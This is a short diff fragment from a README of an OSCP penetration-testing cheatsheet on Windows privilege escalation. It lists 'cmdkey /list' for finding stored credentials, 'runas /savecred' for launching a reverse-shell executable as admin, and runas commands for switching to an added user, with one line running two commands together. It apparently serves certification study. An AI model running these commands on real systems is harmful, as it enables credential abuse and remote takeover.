Kevinolinn8/OSCP-Cheatsheet/README.md

 cmdkey /list #Displays stored credentials looks for any optential users
 #Transfer the reverseshell
 runas /savecred /user:admin C:\Temp\reverse.exe

+#once we have added a user we can run the following commands to switch users!
+Runas /user:dave2 cmd #run RunAs to switch users powershell -Command "Start-Process cmd -Verb Runas" #once logged in get a powershell instance

 ```

 ### Pass the Hash